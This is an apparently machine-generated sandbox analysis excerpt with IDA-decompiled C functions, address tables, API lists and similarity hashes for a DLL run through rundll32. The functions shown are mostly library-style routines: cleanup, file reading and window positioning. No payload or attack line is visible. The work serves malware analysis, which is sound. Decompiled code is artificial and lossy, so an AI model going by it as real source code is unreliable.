                                                                        0x10004e31
                                                                        0x10004e37
                                                                        0x10004e43
                                                                        0x10004e4c
                                                                        0x10004e52
                                                                        0x10004e6c
                                                                        0x10004e75
                                                                        0x10004e7a
                                                                        0x10004fbd
                                                                        0x10004fbd
                                                                        0x10004fc2
                                                                        0x10004fc7
                                                                        0x10004fcc
                                                                        0x10004fd3
                                                                        0x10004ff4
                                                                        0x1000501f
                                                                        0x10005022
                                                                        0x00000000
                                                                        0x10004e80
                                                                        0x10004e80
                                                                        0x10004e86
                                                                        0x10004e8c
                                                                        0x10004e92
                                                                        0x10004e98
                                                                        0x10004ea0
                                                                        0x10004eb3
                                                                        0x10004ebb
                                                                        0x10004f9b
                                                                        0x10004fb4
                                                                        0x10004fba
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10004ec1
                                                                        0x10004ec1
                                                                        0x10004ec4
                                                                        0x10004eca
                                                                        0x10004ed0
                                                                        0x10004ef3
                                                                        0x10004efc
                                                                        0x10004f1d
                                                                        0x10004f51
                                                                        0x10004f54
                                                                        0x10004f5a
                                                                        0x10004f60
                                                                        0x10004f66
                                                                        0x10004f6c
                                                                        0x10004f6c
                                                                        0x10004f76
                                                                        0x10004f7c
                                                                        0x10004f80
                                                                        0x10004f91
                                                                        0x00000000
                                                                        0x10004ec1
                                                                        0x10004e7a
                                                                        0x1000503a

                                                                        APIs
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 10004E6C
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 10004FB4
                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 10005028
                                                                        • HeapFree.KERNEL32(00000000), ref: 1000502F
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@Heap$FreeProcess
                                                                        • String ID:
                                                                        • API String ID: 834397476-0
                                                                        • Opcode ID: 391aa570712f7e89dbfeb0fca8f603a18ca8548013477e7103293fc6906814a1
                                                                        • Instruction ID: 9f87828e50faab3a5d058e3d57900a61c1aef8edd5c1bc6d424dad7412e7468d
                                                                        • Opcode Fuzzy Hash: 391aa570712f7e89dbfeb0fca8f603a18ca8548013477e7103293fc6906814a1
                                                                        • Instruction Fuzzy Hash: 94719631200B158FE318DF6CCEC5A57B7A9FB89341B05C52ED926CB7A5E670E905CB48
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000E9AF Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 69%
                                                                        			E1000E9AF(intOrPtr __ecx, intOrPtr* __edi) {
				void* __ebx;
				void* __esi;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr _t89;
				intOrPtr* _t90;
				void* _t91;
				intOrPtr _t104;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t148;
				intOrPtr* _t161;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				intOrPtr _t167;
				intOrPtr* _t168;
				void* _t170;
				intOrPtr _t183;

				_t161 = __edi;
				E10011BF0(0x1003af91, _t170);
				_t167 = __ecx;
				 *((intOrPtr*)(_t170 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1004060c;
				 *(_t170 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t121 =  *((intOrPtr*)(__ecx + 0x50));
					if(_t121 != 0) {
						_t122 =  *_t121;
						_push(_t170 - 0x14);
						_push(0x10043208);
						_push(_t122);
						if( *((intOrPtr*)( *_t122))() >= 0) {
							_t124 =  *((intOrPtr*)(_t170 - 0x14));
							_push(_t170 - 0x10);
							_push(0x10043348);
							 *((intOrPtr*)(_t170 - 0x10)) = 0;
							_push(_t124);
							if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
								_t128 =  *((intOrPtr*)(_t170 - 0x10));
								 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
								_t130 =  *((intOrPtr*)(_t170 - 0x10));
								 *((intOrPtr*)( *_t130 + 8))(_t130);
							}
							_t126 =  *((intOrPtr*)(_t170 - 0x14));
							 *((intOrPtr*)( *_t126 + 8))(_t126);
						}
					}
				}
				_push(_t161);
				L8:
				if( *((intOrPtr*)(_t167 + 0x24)) != 0) {
					_t161 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x1c)) + 8));
					 *((intOrPtr*)( *((intOrPtr*)( *_t161)) + 0xbc))( *((intOrPtr*)(_t161 + 8)), 0);
					 *((intOrPtr*)( *_t161 + 0x94)) = 0;
					goto L8;
				}
				 *((intOrPtr*)(_t170 - 0x18)) = _t167 + 0x18;
				E1001E047(_t167 + 0x18);
				if( *((intOrPtr*)(_t167 + 0x40)) == 0) {
					L16:
					_t87 =  *((intOrPtr*)(_t167 + 8));
					if(_t87 != 0) {
						 *((intOrPtr*)( *_t87 + 8))(_t87);
					}
					_t88 =  *((intOrPtr*)(_t167 + 0xc));
					if(_t88 != 0) {
						 *((intOrPtr*)( *_t88 + 8))(_t88);
					}
					if( *((intOrPtr*)(_t167 + 0x14)) == 0) {
						L29:
						_t89 =  *((intOrPtr*)(_t167 + 0x34));
						if(_t89 != 0) {
							__imp__CoTaskMemFree(_t89);
						}
						_t138 =  *((intOrPtr*)(_t167 + 0x54));
						if( *((intOrPtr*)(_t167 + 0x54)) != 0) {
							E1000DA8C(_t138, _t161,  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x50)))));
							E10009EC5( *((intOrPtr*)(_t167 + 0x54)));
						}
						_t162 =  *((intOrPtr*)(_t167 + 0x54));
						_t195 = _t162;
						if(_t162 != 0) {
							E10009EC5(_t162);
							_push(_t162);
							L1001F7A9(0, _t162, _t167, _t195);
						}
						_t163 =  *((intOrPtr*)(_t167 + 0x50));
						_t196 = _t163;
						if(_t163 != 0) {
							E1000E731(_t163, _t196);
							_push(_t163);
							L1001F7A9(0, _t163, _t167, _t196);
						}
						_t90 =  *((intOrPtr*)(_t167 + 0x4c));
						if(_t90 != 0) {
							 *((intOrPtr*)( *_t90 + 8))(_t90);
						}
						_t168 =  *((intOrPtr*)(_t167 + 0x48));
						if(_t168 != 0) {
							 *((intOrPtr*)( *_t168 + 8))(_t168);
						}
						 *(_t170 - 4) =  *(_t170 - 4) | 0xffffffff;
						_t91 = E1001E10D( *((intOrPtr*)(_t170 - 0x18)));
						 *[fs:0x0] =  *((intOrPtr*)(_t170 - 0xc));
						return _t91;
					} else {
						 *((intOrPtr*)(_t170 - 0x10)) = 0;
						if( *((intOrPtr*)(_t167 + 0x10)) <= 0) {
							L28:
							__imp__CoTaskMemFree( *((intOrPtr*)(_t167 + 0x14)));
							goto L29;
						}
						_t165 = 0;
						do {
							_t104 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)) + 4));
							 *((intOrPtr*)(_t170 - 0x14)) = _t104;
							if(_t104 == 0) {
								goto L25;
							} else {
								goto L24;
							}
							do {
								L24:
								 *((intOrPtr*)( *((intOrPtr*)(E10006D96(_t170 - 0x14))) + 0x94)) = 0;
							} while ( *((intOrPtr*)(_t170 - 0x14)) != 0);
							L25:
							E1001E047( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)));
							_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24));
							if(_t148 != 0) {
								 *((intOrPtr*)( *_t148 + 4))(1);
							}
							 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 1;
							_t165 = _t165 + 0x28;
						} while ( *((intOrPtr*)(_t170 - 0x10)) <  *((intOrPtr*)(_t167 + 0x10)));
						goto L28;
					}
				}
				_t161 = 0;
				if( *((intOrPtr*)(_t167 + 0x38)) <= 0) {
					L14:
					if(_t183 != 0) {
						_push( *((intOrPtr*)(_t167 + 0x3c)));
						L1001F7A9(0, _t161, _t167, _t183);
						_push( *((intOrPtr*)(_t167 + 0x40)));
						L1001F7A9(0, _t161, _t167, _t183);
					}
					goto L16;
				}
				 *((intOrPtr*)(_t170 - 0x10)) = 0;
				do {
					__imp__#9( *((intOrPtr*)(_t167 + 0x40)) +  *((intOrPtr*)(_t170 - 0x10)));
					 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 0x10;
					_t161 = _t161 + 1;
				} while (_t161 <  *((intOrPtr*)(_t167 + 0x38)));
				_t183 =  *((intOrPtr*)(_t167 + 0x38));
				goto L14;
			}


























                                                                        0x1000e9af
                                                                        0x1000e9b4
                                                                        0x1000e9be
                                                                        0x1000e9c0
                                                                        0x1000e9c3
                                                                        0x1000e9ce
                                                                        0x1000e9d1
                                                                        0x1000e9d3
                                                                        0x1000e9d8
                                                                        0x1000e9da
                                                                        0x1000e9e1
                                                                        0x1000e9e2
                                                                        0x1000e9e7
                                                                        0x1000e9ec
                                                                        0x1000e9ee
                                                                        0x1000e9f4
                                                                        0x1000e9f5
                                                                        0x1000e9fa
                                                                        0x1000e9ff
                                                                        0x1000ea05
                                                                        0x1000ea07
                                                                        0x1000ea10
                                                                        0x1000ea13
                                                                        0x1000ea19
                                                                        0x1000ea19
                                                                        0x1000ea1c
                                                                        0x1000ea22
                                                                        0x1000ea22
                                                                        0x1000e9ec
                                                                        0x1000e9d8
                                                                        0x1000ea25
                                                                        0x1000ea44
                                                                        0x1000ea47
                                                                        0x1000ea2b
                                                                        0x1000ea36
                                                                        0x1000ea3e
                                                                        0x00000000
                                                                        0x1000ea3e
                                                                        0x1000ea4c
                                                                        0x1000ea4f
                                                                        0x1000ea57
                                                                        0x1000ea91
                                                                        0x1000ea91
                                                                        0x1000ea96
                                                                        0x1000ea9b
                                                                        0x1000ea9b
                                                                        0x1000ea9e
                                                                        0x1000eaa3
                                                                        0x1000eaa8
                                                                        0x1000eaa8
                                                                        0x1000eaae
                                                                        0x1000eb1d
                                                                        0x1000eb1d
                                                                        0x1000eb22
                                                                        0x1000eb25
                                                                        0x1000eb25
                                                                        0x1000eb2b
                                                                        0x1000eb30
                                                                        0x1000eb37
                                                                        0x1000eb3f
                                                                        0x1000eb3f
                                                                        0x1000eb44
                                                                        0x1000eb47
                                                                        0x1000eb49
                                                                        0x1000eb4d
                                                                        0x1000eb52
                                                                        0x1000eb53
                                                                        0x1000eb58
                                                                        0x1000eb59
                                                                        0x1000eb5c
                                                                        0x1000eb5e
                                                                        0x1000eb62
                                                                        0x1000eb67
                                                                        0x1000eb68
                                                                        0x1000eb6d
                                                                        0x1000eb6e
                                                                        0x1000eb74
                                                                        0x1000eb79
                                                                        0x1000eb79
                                                                        0x1000eb7c
                                                                        0x1000eb81
                                                                        0x1000eb86
                                                                        0x1000eb86
                                                                        0x1000eb8c
                                                                        0x1000eb90
                                                                        0x1000eb9a
                                                                        0x1000eba2
                                                                        0x1000eab0
                                                                        0x1000eab3
                                                                        0x1000eab6
                                                                        0x1000eb14
                                                                        0x1000eb17
                                                                        0x00000000
                                                                        0x1000eb17
                                                                        0x1000eab8
                                                                        0x1000eaba
                                                                        0x1000eac1
                                                                        0x1000eac6
                                                                        0x1000eac9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000eacb
                                                                        0x1000eacb
                                                                        0x1000eae0
                                                                        0x1000eae0
                                                                        0x1000eae8
                                                                        0x1000eaef
                                                                        0x1000eaf7
                                                                        0x1000eafd
                                                                        0x1000eb03
                                                                        0x1000eb03
                                                                        0x1000eb06
                                                                        0x1000eb0c
                                                                        0x1000eb0f
                                                                        0x00000000
                                                                        0x1000eaba
                                                                        0x1000eaae
                                                                        0x1000ea59
                                                                        0x1000ea5e
                                                                        0x1000ea7d
                                                                        0x1000ea7d
                                                                        0x1000ea7f
                                                                        0x1000ea82
                                                                        0x1000ea87
                                                                        0x1000ea8a
                                                                        0x1000ea90
                                                                        0x00000000
                                                                        0x1000ea7d
                                                                        0x1000ea60
                                                                        0x1000ea63
                                                                        0x1000ea6a
                                                                        0x1000ea70
                                                                        0x1000ea74
                                                                        0x1000ea75
                                                                        0x1000ea7a
                                                                        0x00000000

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: FreeTask$ClearH_prologVariant
                                                                        • String ID:
                                                                        • API String ID: 82050969-0
                                                                        • Opcode ID: 49f28926b3a515cc494aedc195bb947ea9c7f92216f3cce8caedecae21e31748
                                                                        • Instruction ID: 43d2ea8d123215d3b84d8545f0b19a771d1917bb58f1b2237b0c9da6e0f617ce
                                                                        • Opcode Fuzzy Hash: 49f28926b3a515cc494aedc195bb947ea9c7f92216f3cce8caedecae21e31748
                                                                        • Instruction Fuzzy Hash: 3E712675A00682DFDB24CFA4C9C486AB7F5FF49380715486DE156AB665CB30FC81CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001B36C Relevance: 6.2, APIs: 4, Instructions: 167fileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1001B36C(signed int _a4, signed int _a8, long _a12) {
				void _v5;
				signed int _v12;
				long _v16;
				signed int _t79;
				void* _t82;
				signed int _t86;
				signed int* _t89;
				long _t90;
				void* _t92;
				intOrPtr _t93;
				signed int _t97;
				intOrPtr _t98;
				char _t100;
				signed int _t101;
				long _t103;
				long _t106;
				signed int _t107;
				signed int _t113;
				signed int _t114;
				signed char _t117;
				intOrPtr _t118;
				long _t120;
				void* _t124;
				intOrPtr* _t125;
				signed int _t127;
				signed char* _t128;
				void* _t129;
				void* _t130;

				_v12 = _v12 & 0x00000000;
				_t113 = _a8;
				_t124 = _t113;
				if(_a12 == 0) {
					L42:
					__eflags = 0;
					return 0;
				}
				_t79 = _a4;
				_t125 = 0x1004f920 + (_t79 >> 5) * 4;
				_t127 = (_t79 & 0x0000001f) + (_t79 & 0x0000001f) * 8 << 2;
				_t82 =  *_t125 + _t127;
				_t117 =  *((intOrPtr*)(_t82 + 4));
				if((_t117 & 0x00000002) != 0) {
					goto L42;
				}
				if((_t117 & 0x00000048) != 0 &&  *((char*)(_t82 + 5)) != 0xa) {
					_a12 = _a12 - 1;
					 *_t113 =  *((intOrPtr*)( *_t125 + _t127 + 5));
					_t124 = _t113 + 1;
					_v12 = 1;
					 *((char*)( *_t125 + _t127 + 5)) = 0xa;
				}
				if(ReadFile( *( *_t125 + _t127), _t124, _a12,  &_v16, 0) != 0) {
					_t86 = _v16;
					_t118 =  *_t125;
					_v12 = _v12 + _t86;
					__eflags =  *(_t118 + _t127 + 4) & 0x00000080;
					if(( *(_t118 + _t127 + 4) & 0x00000080) == 0) {
						L41:
						return _v12;
					}
					__eflags = _t86;
					if(_t86 == 0) {
						L15:
						_t89 =  *_t125 + _t127 + 4;
						 *_t89 =  *_t89 & 0x000000fb;
						__eflags =  *_t89;
						L16:
						_t90 = _a8;
						_t120 = _v12 + _t90;
						__eflags = _t90 - _t120;
						_a12 = _t90;
						_v12 = _t120;
						if(_t90 >= _t120) {
							L40:
							_t114 = _t113 - _a8;
							__eflags = _t114;
							_v12 = _t114;
							goto L41;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							_t92 =  *_a12;
							__eflags = _t92 - 0x1a;
							if(_t92 == 0x1a) {
								break;
							}
							__eflags = _t92 - 0xd;
							if(_t92 == 0xd) {
								__eflags = _a12 - _t120 - 1;
								if(_a12 >= _t120 - 1) {
									_a12 = _a12 + 1;
									_t97 = ReadFile( *( *_t125 + _t127),  &_v5, 1,  &_v16, 0);
									__eflags = _t97;
									if(_t97 != 0) {
										L26:
										__eflags = _v16;
										if(_v16 == 0) {
											L34:
											 *_t113 = 0xd;
											L35:
											_t113 = _t113 + 1;
											__eflags = _t113;
											L36:
											_t120 = _v12;
											__eflags = _a12 - _t120;
											if(_a12 < _t120) {
												continue;
											}
											goto L40;
										}
										_t98 =  *_t125;
										__eflags =  *(_t98 + _t127 + 4) & 0x00000048;
										if(( *(_t98 + _t127 + 4) & 0x00000048) == 0) {
											__eflags = _t113 - _a8;
											if(__eflags != 0) {
												L33:
												E1001968C(__eflags, _a4, 0xffffffff, 1);
												_t130 = _t130 + 0xc;
												__eflags = _v5 - 0xa;
												if(_v5 == 0xa) {
													goto L36;
												}
												goto L34;
											}
											__eflags = _v5 - 0xa;
											if(__eflags != 0) {
												goto L33;
											}
											L32:
											 *_t113 = 0xa;
											goto L35;
										}
										_t100 = _v5;
										__eflags = _t100 - 0xa;
										if(_t100 == 0xa) {
											goto L32;
										}
										 *_t113 = 0xd;
										 *((char*)( *_t125 + _t127 + 5)) = _t100;
										goto L35;
									}
									_t101 = GetLastError();
									__eflags = _t101;
									if(_t101 != 0) {
										goto L34;
									}
									goto L26;
								}
								_t103 = _a12 + 1;
								__eflags =  *_t103 - 0xa;
								if( *_t103 != 0xa) {
									_a12 = _t103;
									goto L34;
								}
								_a12 = _a12 + 2;
								goto L32;
							}
							 *_t113 = _t92;
							_t113 = _t113 + 1;
							_a12 = _a12 + 1;
							goto L36;
						}
						_t93 =  *_t125;
						__eflags =  *(_t93 + _t127 + 4) & 0x00000040;
						if(( *(_t93 + _t127 + 4) & 0x00000040) == 0) {
							_t128 = _t93 + _t127 + 4;
							 *_t128 =  *_t128 | 0x00000002;
							__eflags =  *_t128;
						}
						goto L40;
					}
					__eflags =  *_t113 - 0xa;
					if( *_t113 != 0xa) {
						goto L15;
					}
					 *(_t118 + _t127 + 4) =  *(_t118 + _t127 + 4) | 0x00000004;
					goto L16;
				} else {
					_t106 = GetLastError();
					_t129 = 5;
					if(_t106 != _t129) {
						__eflags = _t106 - 0x6d;
						if(_t106 == 0x6d) {
							goto L42;
						}
						_t107 = E10013707(_t106);
						L10:
						return _t107 | 0xffffffff;
					}
					 *((intOrPtr*)(E100136F5())) = 9;
					_t107 = E100136FE();
					 *_t107 = _t129;
					goto L10;
				}
			}































                                                                        0x1001b372
                                                                        0x1001b37b
                                                                        0x1001b380
                                                                        0x1001b382
                                                                        0x1001b540
                                                                        0x1001b540
                                                                        0x00000000
                                                                        0x1001b540
                                                                        0x1001b388
                                                                        0x1001b396
                                                                        0x1001b39f
                                                                        0x1001b3a2
                                                                        0x1001b3a4
                                                                        0x1001b3aa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b3b3
                                                                        0x1001b3c1
                                                                        0x1001b3c4
                                                                        0x1001b3c8
                                                                        0x1001b3cb
                                                                        0x1001b3d2
                                                                        0x1001b3d2
                                                                        0x1001b3ee
                                                                        0x1001b429
                                                                        0x1001b42c
                                                                        0x1001b42e
                                                                        0x1001b431
                                                                        0x1001b436
                                                                        0x1001b53b
                                                                        0x00000000
                                                                        0x1001b53b
                                                                        0x1001b43c
                                                                        0x1001b43e
                                                                        0x1001b450
                                                                        0x1001b452
                                                                        0x1001b456
                                                                        0x1001b456
                                                                        0x1001b459
                                                                        0x1001b459
                                                                        0x1001b45f
                                                                        0x1001b461
                                                                        0x1001b463
                                                                        0x1001b466
                                                                        0x1001b469
                                                                        0x1001b535
                                                                        0x1001b535
                                                                        0x1001b535
                                                                        0x1001b538
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b46f
                                                                        0x1001b46f
                                                                        0x1001b472
                                                                        0x1001b474
                                                                        0x1001b476
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b47c
                                                                        0x1001b47e
                                                                        0x1001b48c
                                                                        0x1001b48f
                                                                        0x1001b4a5
                                                                        0x1001b4b9
                                                                        0x1001b4bf
                                                                        0x1001b4c1
                                                                        0x1001b4cd
                                                                        0x1001b4cd
                                                                        0x1001b4d1
                                                                        0x1001b513
                                                                        0x1001b513
                                                                        0x1001b516
                                                                        0x1001b516
                                                                        0x1001b516
                                                                        0x1001b517
                                                                        0x1001b517
                                                                        0x1001b51a
                                                                        0x1001b51d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b523
                                                                        0x1001b4d3
                                                                        0x1001b4d5
                                                                        0x1001b4da
                                                                        0x1001b4ee
                                                                        0x1001b4f1
                                                                        0x1001b4fe
                                                                        0x1001b505
                                                                        0x1001b50a
                                                                        0x1001b50d
                                                                        0x1001b511
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b511
                                                                        0x1001b4f3
                                                                        0x1001b4f7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b4f9
                                                                        0x1001b4f9
                                                                        0x00000000
                                                                        0x1001b4f9
                                                                        0x1001b4dc
                                                                        0x1001b4df
                                                                        0x1001b4e1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b4e3
                                                                        0x1001b4e8
                                                                        0x00000000
                                                                        0x1001b4e8
                                                                        0x1001b4c3
                                                                        0x1001b4c9
                                                                        0x1001b4cb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b4cb
                                                                        0x1001b494
                                                                        0x1001b495
                                                                        0x1001b498
                                                                        0x1001b4a0
                                                                        0x00000000
                                                                        0x1001b4a0
                                                                        0x1001b49a
                                                                        0x00000000
                                                                        0x1001b49a
                                                                        0x1001b480
                                                                        0x1001b482
                                                                        0x1001b483
                                                                        0x00000000
                                                                        0x1001b483
                                                                        0x1001b525
                                                                        0x1001b527
                                                                        0x1001b52c
                                                                        0x1001b52e
                                                                        0x1001b532
                                                                        0x1001b532
                                                                        0x1001b532
                                                                        0x00000000
                                                                        0x1001b52c
                                                                        0x1001b440
                                                                        0x1001b443
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b44b
                                                                        0x00000000
                                                                        0x1001b3f0
                                                                        0x1001b3f0
                                                                        0x1001b3f8
                                                                        0x1001b3fb
                                                                        0x1001b411
                                                                        0x1001b414
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001b41b
                                                                        0x1001b421
                                                                        0x00000000
                                                                        0x1001b421
                                                                        0x1001b402
                                                                        0x1001b408
                                                                        0x1001b40d
                                                                        0x00000000
                                                                        0x1001b40d

                                                                        APIs
                                                                        • ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 1001B3E6
                                                                        • GetLastError.KERNEL32(?,?,?), ref: 1001B3F0
                                                                        • ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 1001B4B9
                                                                        • GetLastError.KERNEL32(?,?,?), ref: 1001B4C3
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorFileLastRead
                                                                        • String ID:
                                                                        • API String ID: 1948546556-0
                                                                        • Opcode ID: 1586ebca8aaa9a6ea4319f4853b1feeec289fced979c0bdf45d6e5b6f0657abd
                                                                        • Instruction ID: 3bbfbaef22ec515d269d62fd47d355a82d48074a4c8ee7a64ff4f0343116150f
                                                                        • Opcode Fuzzy Hash: 1586ebca8aaa9a6ea4319f4853b1feeec289fced979c0bdf45d6e5b6f0657abd
                                                                        • Instruction Fuzzy Hash: DB61D374A04B89DFDB21CFA8C880B997BF0EF05354F158099E9618F2A2D770DAC1CB11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000E58F Relevance: 6.2, APIs: 4, Instructions: 165windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 63%
                                                                        			E1000E58F(void* __ecx, void* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr* _t62;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t84;
				void* _t107;
				void* _t126;
				intOrPtr _t130;
				intOrPtr* _t131;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t135;
				intOrPtr _t136;
				void* _t137;

				_t126 = __edx;
				_t135 = __ecx;
				_t130 = E10023092( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 0x24)));
				_v12 = _t130;
				_t58 = IsWindowVisible( *(_t130 + 0x1c));
				asm("sbb eax, eax");
				_t60 =  ~_t58 + 1;
				_v24 = _t60;
				_t107 = 0;
				if(_t60 != 0) {
					GetWindowRect( *(E100220EE(_t137, GetDesktopWindow()) + 0x1c),  &_v56);
					GetWindowRect( *(_t130 + 0x1c),  &_v40);
					asm("cdq");
					asm("cdq");
					E1002036F(_t130, _v56.right - _v56.left - _t126 >> 1, _v56.bottom - _v56.top - _t126 >> 1, _t107, _t107, _t107);
					E100203AD(_t130, 1);
				}
				_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 4)) + 0x4c));
				_t131 = _t135 + 0x48;
				_push(_t131);
				_push(0x100405f8);
				_push(_t62);
				if( *((intOrPtr*)( *_t62))() < 0) {
					_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 4)) + 0x4c));
					_t66 =  *((intOrPtr*)( *_t65))(_t65, 0x10040550,  &_v16);
					if(_t66 >= _t107) {
						_t67 = _v16;
						 *((intOrPtr*)( *_t67 + 0x14))(_t67,  &_v20);
						_t69 = _v16;
						 *((intOrPtr*)( *_t69 + 8))(_t69);
						_t71 = _v20;
						if(_t71 != _t107) {
							_t133 = _t135 + 8;
							_v8 =  *((intOrPtr*)( *_t71))(_t71, 0x10042ff8, _t133);
							_t73 = _v20;
							 *((intOrPtr*)( *_t73 + 8))(_t73);
							_t66 = _v8;
							if(_t66 >= _t107) {
								_t134 =  *_t133;
								 *((intOrPtr*)( *_t134))(_t134, 0x10042fe8, _t135 + 0xc);
								goto L14;
							}
						} else {
							_t66 = 0x80004005;
						}
					}
				} else {
					_t84 =  *_t131;
					_t134 = _t135 + 0x4c;
					_v8 =  *((intOrPtr*)( *_t84 + 0xc))(_t84, _t107, 0x10043298, _t134);
					if( *_t134 == _t107) {
						_v8 = 0x80004003;
					}
					if(_v8 >= _t107) {
						L14:
						_t136 = E1000E14F(_t107, _t135, _t134, _t135);
						if(_v24 != _t107) {
							E1002036F(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
							E100203AD(_v12, _t107);
						}
						_t66 = _t136;
					} else {
						if(_v24 != _t107) {
							E1002036F(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
							E100203AD(_v12, _t107);
						}
						_t66 = _v8;
					}
				}
				return _t66;
			}

































                                                                        0x1000e58f
                                                                        0x1000e597
                                                                        0x1000e5a5
                                                                        0x1000e5aa
                                                                        0x1000e5ad
                                                                        0x1000e5b5
                                                                        0x1000e5b7
                                                                        0x1000e5ba
                                                                        0x1000e5bd
                                                                        0x1000e5be
                                                                        0x1000e5d3
                                                                        0x1000e5e0
                                                                        0x1000e5ed
                                                                        0x1000e5fd
                                                                        0x1000e603
                                                                        0x1000e60c
                                                                        0x1000e60c
                                                                        0x1000e614
                                                                        0x1000e619
                                                                        0x1000e61c
                                                                        0x1000e61d
                                                                        0x1000e622
                                                                        0x1000e627
